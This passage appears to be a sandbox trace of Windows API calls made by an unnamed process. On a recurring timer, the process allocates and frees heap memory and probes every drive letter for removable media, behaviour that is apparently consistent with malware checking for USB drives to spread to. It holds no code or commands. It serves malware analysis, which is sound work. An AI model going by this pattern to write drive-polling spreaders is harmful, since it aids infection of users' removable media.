0x14bd298 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0220.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0220.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0220.046] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0220.046] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.046] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.046] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.046] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.047] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0220.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.047] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.047] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.047] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.048] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.048] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.048] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.048] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.048] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.048] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.048] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.049] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.049] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.049] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.049] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.050] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.050] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.050] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.050] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.051] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.051] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.051] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.051] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.051] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.052] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.052] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.052] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.053] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0220.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.053] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.054] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.054] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.054] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.054] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.054] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0220.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0220.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0220.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0220.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0220.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0220.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.055] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0220.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.055] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.055] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.056] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0220.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.056] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.056] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.057] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.057] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.057] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.057] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.057] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.057] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.058] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.058] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.058] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.058] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.059] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.059] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.059] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.059] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.059] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.060] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.060] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.060] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.061] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.061] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.061] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.061] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.061] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.062] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.062] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0220.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.063] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.063] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.063] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.063] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0220.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0220.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0220.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0220.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.065] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.065] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.065] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.065] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0220.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0220.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0220.066] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.066] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.066] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.066] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.067] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.067] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.067] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.067] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.067] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.068] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.068] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.068] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.068] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.068] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.069] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.069] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.069] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.069] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.069] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.070] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.070] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.070] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.070] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.071] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.071] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.071] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.071] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0220.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0220.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.072] HeapFree (in: 